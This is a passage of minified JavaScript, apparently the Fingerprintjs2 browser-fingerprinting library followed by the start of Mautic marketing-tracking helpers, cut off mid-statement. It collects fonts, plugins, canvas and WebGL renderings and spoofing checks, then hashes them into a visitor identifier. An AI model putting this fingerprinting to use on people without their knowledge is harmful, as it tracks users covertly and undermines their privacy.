ITC","Eras Demi ITC","Eras Light ITC","Eras Medium ITC","EucrosiaUPC","Euphemia","Euphemia UCAS","EUROSTILE","Exotc350 Bd BT","FangSong","Felix Titling","Fixedsys","FONTIN","Footlight MT Light","Forte","FrankRuehl","Fransiscan","Freefrm721 Blk BT","FreesiaUPC","Freestyle Script","French Script MT","FrnkGothITC Bk BT","Fruitger","FRUTIGER","Futura","Futura Bk BT","Futura Lt BT","Futura Md BT","Futura ZBlk BT","FuturaBlack BT","Gabriola","Galliard BT","Gautami","Geeza Pro","Geometr231 BT","Geometr231 Hv BT","Geometr231 Lt BT","GeoSlab 703 Lt BT","GeoSlab 703 XBd BT","Gigi","Gill Sans","Gill Sans MT","Gill Sans MT Condensed","Gill Sans MT Ext Condensed Bold","Gill Sans Ultra Bold","Gill Sans Ultra Bold Condensed","Gisha","Gloucester MT Extra Condensed","GOTHAM","GOTHAM BOLD","Goudy Old Style","Goudy Stout","GoudyHandtooled BT","GoudyOLSt BT","Gujarati Sangam MN","Gulim","GulimChe","Gungsuh","GungsuhChe","Gurmukhi MN","Haettenschweiler","Harlow Solid Italic","Harrington","Heather","Heiti SC","Heiti TC","HELV","Herald","High Tower Text","Hiragino Kaku Gothic ProN","Hiragino Mincho ProN","Hoefler Text","Humanst 521 Cn BT","Humanst521 BT","Humanst521 Lt BT","Imprint MT Shadow","Incised901 Bd BT","Incised901 BT","Incised901 Lt BT","INCONSOLATA","Informal Roman","Informal011 BT","INTERSTATE","IrisUPC","Iskoola Pota","JasmineUPC","Jazz LET","Jenson","Jester","Jokerman","Juice ITC","Kabel Bk BT","Kabel Ult BT","Kailasa","KaiTi","Kalinga","Kannada Sangam MN","Kartika","Kaufmann Bd BT","Kaufmann BT","Khmer UI","KodchiangUPC","Kokila","Korinna BT","Kristen ITC","Krungthep","Kunstler Script","Lao UI","Latha","Leelawadee","Letter Gothic","Levenim MT","LilyUPC","Lithograph","Lithograph Light","Long Island","Lydian BT","Magneto","Maiandra GD","Malayalam Sangam MN","Malgun Gothic","Mangal","Marigold","Marion","Marker Felt","Market","Marlett","Matisse ITC","Matura MT Script Capitals","Meiryo","Meiryo UI","Microsoft Himalaya","Microsoft JhengHei","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Uighur","Microsoft YaHei","Microsoft Yi Baiti","MingLiU","MingLiU_HKSCS","MingLiU_HKSCS-ExtB","MingLiU-ExtB","Minion","Minion Pro","Miriam","Miriam Fixed","Mistral","Modern","Modern No. 20","Mona Lisa Solid ITC TT","Mongolian Baiti","MONO","MoolBoran","Mrs Eaves","MS LineDraw","MS Mincho","MS PMincho","MS Reference Specialty","MS UI Gothic","MT Extra","MUSEO","MV Boli","Nadeem","Narkisim","NEVIS","News Gothic","News GothicMT","NewsGoth BT","Niagara Engraved","Niagara Solid","Noteworthy","NSimSun","Nyala","OCR A Extended","Old Century","Old English Text MT","Onyx","Onyx BT","OPTIMA","Oriya Sangam MN","OSAKA","OzHandicraft BT","Palace Script MT","Papyrus","Parchment","Party LET","Pegasus","Perpetua","Perpetua Titling MT","PetitaBold","Pickwick","Plantagenet Cherokee","Playbill","PMingLiU","PMingLiU-ExtB","Poor Richard","Poster","PosterBodoni BT","PRINCETOWN LET","Pristina","PTBarnum BT","Pythagoras","Raavi","Rage Italic","Ravie","Ribbon131 Bd BT","Rockwell","Rockwell Condensed","Rockwell Extra Bold","Rod","Roman","Sakkal Majalla","Santa Fe LET","Savoye LET","Sceptre","Script","Script MT Bold","SCRIPTINA","Serifa","Serifa BT","Serifa Th BT","ShelleyVolante BT","Sherwood","Shonar Bangla","Showcard Gothic","Shruti","Signboard","SILKSCREEN","SimHei","Simplified Arabic","Simplified Arabic Fixed","SimSun","SimSun-ExtB","Sinhala Sangam MN","Sketch Rockwell","Skia","Small Fonts","Snap ITC","Snell Roundhand","Socket","Souvenir Lt BT","Staccato222 BT","Steamer","Stencil","Storybook","Styllo","Subway","Swis721 BlkEx BT","Swiss911 XCm BT","Sylfaen","Synchro LET","System","Tamil Sangam MN","Technical","Teletype","Telugu Sangam MN","Tempus Sans ITC","Terminal","Thonburi","Traditional Arabic","Trajan","TRAJAN PRO","Tristan","Tubular","Tunga","Tw Cen MT","Tw Cen MT Condensed","Tw Cen MT Condensed Extra Bold","TypoUpright BT","Unicorn","Univers","Univers CE 55 Medium","Univers Condensed","Utsaah","Vagabond","Vani","Vijaya","Viner Hand ITC","VisualUI","Vivaldi","Vladimir Script","Vrinda","Westminster","WHITNEY","Wide Latin","ZapfEllipt BT","ZapfHumnst BT","ZapfHumnst Dm BT","Zapfino","Zurich BlkEx BT","Zurich Ex BT","ZWAdobeF"];i.options.extendedJsFonts&&(r=r.concat(n)),r=r.concat(i.options.userDefinedFonts);var o="mmmmmmmmmmlli",s="72px",l=document.getElementsByTagName("body")[0],h=document.createElement("div"),u=document.createElement("div"),d={},c={},g=function(){var e=document.createElement("span");return e.style.position="absolute",e.style.left="-9999px",e.style.fontSize=s,e.style.lineHeight="normal",e.innerHTML=o,e},p=function(e,t){var i=g();return i.style.fontFamily="'"+e+"',"+t,i},f=function(){for(var e=[],t=0,i=a.length;t<i;t++){var r=g();r.style.fontFamily=a[t],h.appendChild(r),e.push(r)}return e},m=function(){for(var e={},t=0,i=r.length;t<i;t++){for(var n=[],o=0,s=a.length;o<s;o++){var l=p(r[t],a[o]);u.appendChild(l),n.push(l)}e[r[t]]=n}return e},T=function(e){for(var t=!1,i=0;i<a.length;i++)if(t=e[i].offsetWidth!==d[a[i]]||e[i].offsetHeight!==c[a[i]])return t;return t},S=f();l.appendChild(h);for(var x=0,v=a.length;x<v;x++)d[a[x]]=S[x].offsetWidth,c[a[x]]=S[x].offsetHeight;var M=m();l.appendChild(u);for(var A=[],E=0,y=r.length;E<y;E++)T(M[r[E]])&&A.push(r[E]);l.removeChild(u),l.removeChild(h),e.push({key:"js_fonts",value:A}),t(e)},1)},pluginsKey:function(e){return this.options.excludePlugins||(this.isIE()?this.options.excludeIEPlugins||e.push({key:"ie_plugins",value:this.getIEPlugins()}):e.push({key:"regular_plugins",value:this.getRegularPlugins()})),e},getRegularPlugins:function(){for(var e=[],t=0,i=navigator.plugins.length;t<i;t++)e.push(navigator.plugins[t]);return this.pluginsShouldBeSorted()&&(e=e.sort(function(e,t){return e.name>t.name?1:e.name<t.name?-1:0})),this.map(e,function(e){var t=this.map(e,function(e){return[e.type,e.suffixes].join("~")}).join(",");return[e.name,e.description,t].join("::")},this)},getIEPlugins:function(){var e=[];if(Object.getOwnPropertyDescriptor&&Object.getOwnPropertyDescriptor(window,"ActiveXObject")||"ActiveXObject"in window){var t=["AcroPDF.PDF","Adodb.Stream","AgControl.AgControl","DevalVRXCtrl.DevalVRXCtrl.1","MacromediaFlashPaper.MacromediaFlashPaper","Msxml2.DOMDocument","Msxml2.XMLHTTP","PDF.PdfCtrl","QuickTime.QuickTime","QuickTimeCheckObject.QuickTimeCheck.1","RealPlayer","RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX Control (32-bit)","Scripting.Dictionary","SWCtl.SWCtl","Shell.UIHelper","ShockwaveFlash.ShockwaveFlash","Skype.Detection","TDCCtl.TDCCtl","WMPlayer.OCX","rmocx.RealPlayer G2 Control","rmocx.RealPlayer G2 Control.1"];e=this.map(t,function(e){try{return new ActiveXObject(e),e}catch(t){return null}})}return navigator.plugins&&(e=e.concat(this.getRegularPlugins())),e},pluginsShouldBeSorted:function(){for(var e=!1,t=0,i=this.options.sortPluginsFor.length;t<i;t++){var a=this.options.sortPluginsFor[t];if(navigator.userAgent.match(a)){e=!0;break}}return e},touchSupportKey:function(e){return this.options.excludeTouchSupport||e.push({key:"touch_support",value:this.getTouchSupport()}),e},hasSessionStorage:function(){try{return!!window.sessionStorage}catch(e){return!0}},hasLocalStorage:function(){try{return!!window.localStorage}catch(e){return!0}},hasIndexedDB:function(){return!!window.indexedDB},getNavigatorCpuClass:function(){return navigator.cpuClass?navigator.cpuClass:"unknown"},getNavigatorPlatform:function(){return navigator.platform?navigator.platform:"unknown"},getDoNotTrack:function(){return navigator.doNotTrack?navigator.doNotTrack:navigator.msDoNotTrack?navigator.msDoNotTrack:window.doNotTrack?window.doNotTrack:"unknown"},getTouchSupport:function(){var e=0,t=!1;"undefined"!=typeof navigator.maxTouchPoints?e=navigator.maxTouchPoints:"undefined"!=typeof navigator.msMaxTouchPoints&&(e=navigator.msMaxTouchPoints);try{document.createEvent("TouchEvent"),t=!0}catch(i){}var a="ontouchstart"in window;return[e,t,a]},getCanvasFp:function(){var e=[],t=document.createElement("canvas");t.width=2e3,t.height=200,t.style.display="inline";var i=t.getContext("2d");return i.rect(0,0,10,10),i.rect(2,2,6,6),e.push("canvas winding:"+(i.isPointInPath(5,5,"evenodd")===!1?"yes":"no")),i.textBaseline="alphabetic",i.fillStyle="#f60",i.fillRect(125,1,62,20),i.fillStyle="#069",this.options.dontUseFakeFontInCanvas?i.font="11pt Arial":i.font="11pt no-real-font-123",i.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",2,15),i.fillStyle="rgba(102, 204, 0, 0.2)",i.font="18pt Arial",i.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",4,45),i.globalCompositeOperation="multiply",i.fillStyle="rgb(255,0,255)",i.beginPath(),i.arc(50,50,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(0,255,255)",i.beginPath(),i.arc(100,50,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(255,255,0)",i.beginPath(),i.arc(75,100,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(255,0,255)",i.arc(75,75,75,0,2*Math.PI,!0),i.arc(75,75,25,0,2*Math.PI,!0),i.fill("evenodd"),e.push("canvas fp:"+t.toDataURL()),e.join("~")},getWebglFp:function(){var e,t=function(t){return e.clearColor(0,0,0,1),e.enable(e.DEPTH_TEST),e.depthFunc(e.LEQUAL),e.clear(e.COLOR_BUFFER_BIT|e.DEPTH_BUFFER_BIT),"["+t[0]+", "+t[1]+"]"},i=function(e){var t,i=e.getExtension("EXT_texture_filter_anisotropic")||e.getExtension("WEBKIT_EXT_texture_filter_anisotropic")||e.getExtension("MOZ_EXT_texture_filter_anisotropic");return i?(t=e.getParameter(i.MAX_TEXTURE_MAX_ANISOTROPY_EXT),0===t&&(t=2),t):null};if(e=this.getWebglCanvas(),!e)return null;var a=[],r="attribute vec2 attrVertex;varying vec2 varyinTexCoordinate;uniform vec2 uniformOffset;void main(){varyinTexCoordinate=attrVertex+uniformOffset;gl_Position=vec4(attrVertex,0,1);}",n="precision mediump float;varying vec2 varyinTexCoordinate;void main() {gl_FragColor=vec4(varyinTexCoordinate,0,1);}",o=e.createBuffer();e.bindBuffer(e.ARRAY_BUFFER,o);var s=new Float32Array([-.2,-.9,0,.4,-.26,0,0,.732134444,0]);e.bufferData(e.ARRAY_BUFFER,s,e.STATIC_DRAW),o.itemSize=3,o.numItems=3;var l=e.createProgram(),h=e.createShader(e.VERTEX_SHADER);e.shaderSource(h,r),e.compileShader(h);var u=e.createShader(e.FRAGMENT_SHADER);return e.shaderSource(u,n),e.compileShader(u),e.attachShader(l,h),e.attachShader(l,u),e.linkProgram(l),e.useProgram(l),l.vertexPosAttrib=e.getAttribLocation(l,"attrVertex"),l.offsetUniform=e.getUniformLocation(l,"uniformOffset"),e.enableVertexAttribArray(l.vertexPosArray),e.vertexAttribPointer(l.vertexPosAttrib,o.itemSize,e.FLOAT,!1,0,0),e.uniform2f(l.offsetUniform,1,1),e.drawArrays(e.TRIANGLE_STRIP,0,o.numItems),null!=e.canvas&&a.push(e.canvas.toDataURL()),a.push("extensions:"+e.getSupportedExtensions().join(";")),a.push("webgl aliased line width range:"+t(e.getParameter(e.ALIASED_LINE_WIDTH_RANGE))),a.push("webgl aliased point size range:"+t(e.getParameter(e.ALIASED_POINT_SIZE_RANGE))),a.push("webgl alpha bits:"+e.getParameter(e.ALPHA_BITS)),a.push("webgl antialiasing:"+(e.getContextAttributes().antialias?"yes":"no")),a.push("webgl blue bits:"+e.getParameter(e.BLUE_BITS)),a.push("webgl depth bits:"+e.getParameter(e.DEPTH_BITS)),a.push("webgl green bits:"+e.getParameter(e.GREEN_BITS)),a.push("webgl max anisotropy:"+i(e)),a.push("webgl max combined texture image units:"+e.getParameter(e.MAX_COMBINED_TEXTURE_IMAGE_UNITS)),a.push("webgl max cube map texture size:"+e.getParameter(e.MAX_CUBE_MAP_TEXTURE_SIZE)),a.push("webgl max fragment uniform vectors:"+e.getParameter(e.MAX_FRAGMENT_UNIFORM_VECTORS)),a.push("webgl max render buffer size:"+e.getParameter(e.MAX_RENDERBUFFER_SIZE)),a.push("webgl max texture image units:"+e.getParameter(e.MAX_TEXTURE_IMAGE_UNITS)),a.push("webgl max texture size:"+e.getParameter(e.MAX_TEXTURE_SIZE)),a.push("webgl max varying vectors:"+e.getParameter(e.MAX_VARYING_VECTORS)),a.push("webgl max vertex attribs:"+e.getParameter(e.MAX_VERTEX_ATTRIBS)),a.push("webgl max vertex texture image units:"+e.getParameter(e.MAX_VERTEX_TEXTURE_IMAGE_UNITS)),a.push("webgl max vertex uniform vectors:"+e.getParameter(e.MAX_VERTEX_UNIFORM_VECTORS)),a.push("webgl max viewport dims:"+t(e.getParameter(e.MAX_VIEWPORT_DIMS))),a.push("webgl red bits:"+e.getParameter(e.RED_BITS)),a.push("webgl renderer:"+e.getParameter(e.RENDERER)),a.push("webgl shading language version:"+e.getParameter(e.SHADING_LANGUAGE_VERSION)),a.push("webgl stencil bits:"+e.getParameter(e.STENCIL_BITS)),a.push("webgl vendor:"+e.getParameter(e.VENDOR)),a.push("webgl version:"+e.getParameter(e.VERSION)),e.getShaderPrecisionFormat?(a.push("webgl vertex shader high float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).precision),a.push("webgl vertex shader high float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).rangeMin),a.push("webgl vertex shader high float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).rangeMax),a.push("webgl vertex shader medium float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).precision),a.push("webgl vertex shader medium float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).rangeMin),a.push("webgl vertex shader medium float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).rangeMax),a.push("webgl vertex shader low float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).precision),a.push("webgl vertex shader low float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).rangeMin),a.push("webgl vertex shader low float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).rangeMax),a.push("webgl fragment shader high float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).precision),a.push("webgl fragment shader high float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).rangeMin),a.push("webgl fragment shader high float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).rangeMax),a.push("webgl fragment shader medium float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).precision),a.push("webgl fragment shader medium float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).rangeMin),a.push("webgl fragment shader medium float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).rangeMax),a.push("webgl fragment shader low float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).precision),a.push("webgl fragment shader low float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).rangeMin),a.push("webgl fragment shader low float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).rangeMax),a.push("webgl vertex shader high int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).precision),a.push("webgl vertex shader high int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).rangeMin),a.push("webgl vertex shader high int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).rangeMax),a.push("webgl vertex shader medium int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).precision),a.push("webgl vertex shader medium int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).rangeMin),a.push("webgl vertex shader medium int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).rangeMax),a.push("webgl vertex shader low int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).precision),a.push("webgl vertex shader low int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).rangeMin),a.push("webgl vertex shader low int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).rangeMax),a.push("webgl fragment shader high int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).precision),a.push("webgl fragment shader high int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).rangeMin),a.push("webgl fragment shader high int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).rangeMax),a.push("webgl fragment shader medium int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).precision),a.push("webgl fragment shader medium int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).rangeMin),a.push("webgl fragment shader medium int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).rangeMax),a.push("webgl fragment shader low int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).precision),a.push("webgl fragment shader low int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).rangeMin),a.push("webgl fragment shader low int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).rangeMax),a.join("~")):a.join("~")},getAdBlock:function(){var e=document.createElement("div");e.innerHTML="&nbsp;",e.className="adsbox";var t=!1;try{document.body.appendChild(e),t=0===document.getElementsByClassName("adsbox")[0].offsetHeight,document.body.removeChild(e)}catch(i){t=!1}return t},getHasLiedLanguages:function(){if("undefined"!=typeof navigator.languages)try{var e=navigator.languages[0].substr(0,2);if(e!==navigator.language.substr(0,2))return!0}catch(t){return!0}return!1},getHasLiedResolution:function(){return screen.width<screen.availWidth||screen.height<screen.availHeight},getHasLiedOs:function(){var e,t=navigator.userAgent.toLowerCase(),i=navigator.oscpu,a=navigator.platform.toLowerCase();e=t.indexOf("windows phone")>=0?"Windows Phone":t.indexOf("win")>=0?"Windows":t.indexOf("android")>=0?"Android":t.indexOf("linux")>=0?"Linux":t.indexOf("iphone")>=0||t.indexOf("ipad")>=0?"iOS":t.indexOf("mac")>=0?"Mac":"Other";var r;if(r="ontouchstart"in window||navigator.maxTouchPoints>0||navigator.msMaxTouchPoints>0,r&&"Windows Phone"!==e&&"Android"!==e&&"iOS"!==e&&"Other"!==e)return!0;if("undefined"!=typeof i){if(i=i.toLowerCase(),i.indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e)return!0;if(i.indexOf("linux")>=0&&"Linux"!==e&&"Android"!==e)return!0;if(i.indexOf("mac")>=0&&"Mac"!==e&&"iOS"!==e)return!0;if(0===i.indexOf("win")&&0===i.indexOf("linux")&&i.indexOf("mac")>=0&&"other"!==e)return!0}return a.indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e||((a.indexOf("linux")>=0||a.indexOf("android")>=0||a.indexOf("pike")>=0)&&"Linux"!==e&&"Android"!==e||((a.indexOf("mac")>=0||a.indexOf("ipad")>=0||a.indexOf("ipod")>=0||a.indexOf("iphone")>=0)&&"Mac"!==e&&"iOS"!==e||(0===a.indexOf("win")&&0===a.indexOf("linux")&&a.indexOf("mac")>=0&&"other"!==e||"undefined"==typeof navigator.plugins&&"Windows"!==e&&"Windows Phone"!==e)))},getHasLiedBrowser:function(){var e,t=navigator.userAgent.toLowerCase(),i=navigator.productSub;if(e=t.indexOf("firefox")>=0?"Firefox":t.indexOf("opera")>=0||t.indexOf("opr")>=0?"Opera":t.indexOf("chrome")>=0?"Chrome":t.indexOf("safari")>=0?"Safari":t.indexOf("trident")>=0?"Internet Explorer":"Other",("Chrome"===e||"Safari"===e||"Opera"===e)&&"20030107"!==i)return!0;var a=eval.toString().length;if(37===a&&"Safari"!==e&&"Firefox"!==e&&"Other"!==e)return!0;if(39===a&&"Internet Explorer"!==e&&"Other"!==e)return!0;if(33===a&&"Chrome"!==e&&"Opera"!==e&&"Other"!==e)return!0;var r;try{throw"a"}catch(n){try{n.toSource(),r=!0}catch(o){r=!1}}return!(!r||"Firefox"===e||"Other"===e)},isCanvasSupported:function(){var e=document.createElement("canvas");return!(!e.getContext||!e.getContext("2d"))},isWebGlSupported:function(){if(!this.isCanvasSupported())return!1;var e,t=document.createElement("canvas");try{e=t.getContext&&(t.getContext("webgl")||t.getContext("experimental-webgl"))}catch(i){e=!1}return!!window.WebGLRenderingContext&&!!e},isIE:function(){return"Microsoft Internet Explorer"===navigator.appName||!("Netscape"!==navigator.appName||!/Trident/.test(navigator.userAgent))},hasSwfObjectLoaded:function(){return"undefined"!=typeof window.swfobject},hasMinFlashInstalled:function(){return swfobject.hasFlashPlayerVersion("9.0.0")},addFlashDivNode:function(){var e=document.createElement("div");e.setAttribute("id",this.options.swfContainerId),document.body.appendChild(e)},loadSwfAndDetectFonts:function(e){var t="___fp_swf_loaded";window[t]=function(t){e(t)};var i=this.options.swfContainerId;this.addFlashDivNode();var a={onReady:t},r={allowScriptAccess:"always",menu:"false"};swfobject.embedSWF(this.options.swfPath,i,"1","1","9.0.0",!1,a,r,{})},getWebglCanvas:function(){var e=document.createElement("canvas"),t=null;try{t=e.getContext("webgl")||e.getContext("experimental-webgl")}catch(i){}return t||(t=null),t},each:function(e,t,i){if(null!==e)if(this.nativeForEach&&e.forEach===this.nativeForEach)e.forEach(t,i);else if(e.length===+e.length){for(var a=0,r=e.length;a<r;a++)if(t.call(i,e[a],a,e)==={})return}else for(var n in e)if(e.hasOwnProperty(n)&&t.call(i,e[n],n,e)==={})return},map:function(e,t,i){var a=[];return null==e?a:this.nativeMap&&e.map===this.nativeMap?e.map(t,i):(this.each(e,function(e,r,n){a[a.length]=t.call(i,e,r,n)}),a)},x64Add:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var i=[0,0,0,0];return i[3]+=e[3]+t[3],i[2]+=i[3]>>>16,i[3]&=65535,i[2]+=e[2]+t[2],i[1]+=i[2]>>>16,i[2]&=65535,i[1]+=e[1]+t[1],i[0]+=i[1]>>>16,i[1]&=65535,i[0]+=e[0]+t[0],i[0]&=65535,[i[0]<<16|i[1],i[2]<<16|i[3]]},x64Multiply:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var i=[0,0,0,0];return i[3]+=e[3]*t[3],i[2]+=i[3]>>>16,i[3]&=65535,i[2]+=e[2]*t[3],i[1]+=i[2]>>>16,i[2]&=65535,i[2]+=e[3]*t[2],i[1]+=i[2]>>>16,i[2]&=65535,i[1]+=e[1]*t[3],i[0]+=i[1]>>>16,i[1]&=65535,i[1]+=e[2]*t[2],i[0]+=i[1]>>>16,i[1]&=65535,i[1]+=e[3]*t[1],i[0]+=i[1]>>>16,i[1]&=65535,i[0]+=e[0]*t[3]+e[1]*t[2]+e[2]*t[1]+e[3]*t[0],i[0]&=65535,[i[0]<<16|i[1],i[2]<<16|i[3]]},x64Rotl:function(e,t){return t%=64,32===t?[e[1],e[0]]:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t|e[0]>>>32-t]:(t-=32,[e[1]<<t|e[0]>>>32-t,e[0]<<t|e[1]>>>32-t])},x64LeftShift:function(e,t){return t%=64,0===t?e:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t]:[e[1]<<t-32,0]},x64Xor:function(e,t){return[e[0]^t[0],e[1]^t[1]]},x64Fmix:function(e){return e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[4283543511,3981806797]),e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[3301882366,444984403]),e=this.x64Xor(e,[0,e[0]>>>1])},x64hash128:function(e,t){e=e||"",t=t||0;for(var i=e.length%16,a=e.length-i,r=[0,t],n=[0,t],o=[0,0],s=[0,0],l=[2277735313,289559509],h=[1291169091,658871167],u=0;u<a;u+=16)o=[255&e.charCodeAt(u+4)|(255&e.charCodeAt(u+5))<<8|(255&e.charCodeAt(u+6))<<16|(255&e.charCodeAt(u+7))<<24,255&e.charCodeAt(u)|(255&e.charCodeAt(u+1))<<8|(255&e.charCodeAt(u+2))<<16|(255&e.charCodeAt(u+3))<<24],s=[255&e.charCodeAt(u+12)|(255&e.charCodeAt(u+13))<<8|(255&e.charCodeAt(u+14))<<16|(255&e.charCodeAt(u+15))<<24,255&e.charCodeAt(u+8)|(255&e.charCodeAt(u+9))<<8|(255&e.charCodeAt(u+10))<<16|(255&e.charCodeAt(u+11))<<24],o=this.x64Multiply(o,l),o=this.x64Rotl(o,31),o=this.x64Multiply(o,h),r=this.x64Xor(r,o),r=this.x64Rotl(r,27),r=this.x64Add(r,n),r=this.x64Add(this.x64Multiply(r,[0,5]),[0,1390208809]),s=this.x64Multiply(s,h),s=this.x64Rotl(s,33),s=this.x64Multiply(s,l),n=this.x64Xor(n,s),n=this.x64Rotl(n,31),n=this.x64Add(n,r),n=this.x64Add(this.x64Multiply(n,[0,5]),[0,944331445]);switch(o=[0,0],s=[0,0],i){case 15:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+14)],48));case 14:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+13)],40));case 13:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+12)],32));case 12:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+11)],24));case 11:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+10)],16));case 10:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+9)],8));case 9:s=this.x64Xor(s,[0,e.charCodeAt(u+8)]),s=this.x64Multiply(s,h),s=this.x64Rotl(s,33),s=this.x64Multiply(s,l),n=this.x64Xor(n,s);case 8:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+7)],56));case 7:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+6)],48));case 6:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+5)],40));case 5:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+4)],32));case 4:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+3)],24));case 3:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+2)],16));case 2:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+1)],8));case 1:o=this.x64Xor(o,[0,e.charCodeAt(u)]),o=this.x64Multiply(o,l),o=this.x64Rotl(o,31),o=this.x64Multiply(o,h),r=this.x64Xor(r,o)}return r=this.x64Xor(r,[0,e.length]),n=this.x64Xor(n,[0,e.length]),r=this.x64Add(r,n),n=this.x64Add(n,r),r=this.x64Fmix(r),n=this.x64Fmix(n),r=this.x64Add(r,n),n=this.x64Add(n,r),("00000000"+(r[0]>>>0).toString(16)).slice(-8)+("00000000"+(r[1]>>>0).toString(16)).slice(-8)+("00000000"+(n[0]>>>0).toString(16)).slice(-8)+("00000000"+(n[1]>>>0).toString(16)).slice(-8)}},e.VERSION="1.4.4",e});(function(){if(typeof window.CustomEvent==="function")return false;function CustomEvent(event,params){params=params||{bubbles:false,cancelable:false,detail:undefined};var evt=document.createEvent('CustomEvent');evt.initCustomEvent(event,params.bubbles,params.cancelable,params.detail);return evt;} CustomEvent.prototype=window.Event.prototype;window.CustomEvent=CustomEvent;})();var MauticJS=MauticJS||{};MauticJS.serialize=function(obj){if('string'==typeof obj){return obj;} return Object.keys(obj).map(function(key){return encodeURIComponent(key)+'='+encodeURIComponent(obj[key]);}).join('&');};MauticJS.documentReady=function(f){/in/.test(document.readyState)?setTimeout(function(){MauticJS.documentReady(f)},9):f();};MauticJS.iterateCollection=function(collection){return function(f){for(var i=0;collection[i];i++){f(collection[i],i);}};};MauticJS.log=function(){var log={};log.history=log.history||[];log.history.push(arguments);if(window.console){console.log(Array.prototype.slice.call(arguments));}};MauticJS.setCookie=function(name,value){document.cookie=name+"="+value+";";};MauticJS.createCORSRequest=function(method,url){var xhr=new XMLHttpRequest();method=method.toUpperCase();if("withCredentials"in xhr){xhr.open(method,url,true);}else if(typeof XDomainRequest!="undefined"){xhr=new 